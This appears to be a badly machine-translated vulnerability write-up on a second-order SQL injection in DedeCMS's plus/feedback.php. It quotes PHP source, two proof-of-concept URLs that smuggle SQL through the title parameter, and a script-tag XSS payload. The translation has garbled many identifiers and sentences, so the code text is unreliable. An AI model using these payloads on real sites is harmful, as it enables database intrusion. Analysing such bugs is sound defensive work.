Dedecms chicken-level injection and detailed analysis process

A secondary injection is very bad because of the limited word count. In addition, I wish you a happy New Year: 233 extract ($ arcRow, EXTR_SKIP); 234 $ msg = cn_substrR (TrimMsg ($ msg), 1000 ); 235 $ username = cn_substrR (HtmlReplace ($ username, 2), 20); 236 if (empty ($ feedbacktype) | ($ feedbacktype! = 'Good' & $ feedbacktype! = 'Bad') 237 {238 $ feedbacktype = 'feedback'; 239} 240 // Save the comment content 241 if ($ comtype = 'comments ') 242 {243 $ arctitle = addslashes ($ title); 244 $ typeid = intval ($ typeid); 245 $ ischeck = intval ($ ischeck ); 246 $ feedbacktype = preg_replace ("# [^ 0-9a-z] # I", "", $ feedbacktype); 247 if ($ msg! = '') 248 {249 $ inquery =" insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artle tle', 'IP ', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype', 'face', 'msg') 250 VALUES ('$ aid ', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime', '{$ cfg_ml-> M_ID }', '0', '0', '$ feedbacktype', '$ face',' $ msg '); "; 251 $ rs = $ dsql-> ExecuteNoneQuery ($ inquery ); 252 if (! $ Rs) 253 {254 ShowMsg ('An error occurred while posting a comment! ','-1'); 255 // echo $ dsql-> GetError (); 256 exit (); 257} 258} 259} 260 // reference 261 elseif ($ comtype = 'reply ') 262 {263 $ row = $ dsql-> GetOne ("SELECT * FROM 'dede _ feedback' WHERE id = '$ fid '"); 264 $ arctitle = $ row ['artle TLE ']; 265 $ aid = $ row ['aid']; 266 $ msg = $ quotemsg. $ msg; 267 $ msg = HtmlReplace ($ msg, 2); 268 $ inquery = "insert into 'dede _ feedback' ('aid ', 'typeid', 'username ', 'artitle', 'IP', 'ischeck', 'dtime', 'mid, 'bad', 'good', 'ftype', 'face', 'msg ') 269 VALUES ('$ aid', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime ', '{$ pai_ml-> M_ID}', '0', '0', '$ feedbacktype', '$ face', '$ msg ')"; 270 $ dsql-> ExecuteNoneQuery ($ inquery); 271} Theory: insert → select → insert Type line 233, specified as EXTR_SKIP, so we can set the $ title Value line 243 at will, before the first insert operation, $ title is filtered out. When $ title = test \ 'enters the database, it is changed to test 'line 263, the select arctitle is test', and then enters insert again, resulting in actual injection: assume that the first input is: http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=comments&isconfirm=yes&notuser=1&msg=stage1111&title=yy ', 0, 'feedback', 0, @ version), (9, 1, '',' when gpc is on, the $ title of line 243 is escaped twice. When it enters the database, it becomes and we reference this message: http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=reply&isconfirm=yes&notuser=1&msg=stage2222&fid=38 Rereference the message of id 41: Successful injection: the theoretical significance is greater than the actual significance. This injection is not very harmful because the field arctitle is defined as varchar (60) not null in mysql, 60 bytes is not enough to bypass the ids. Similarly, there is plus/bookfeedback. php, but bookfeedback. php does not seem to be enabled or tested. By the way, when title = <script> alert (1) </script>, an xss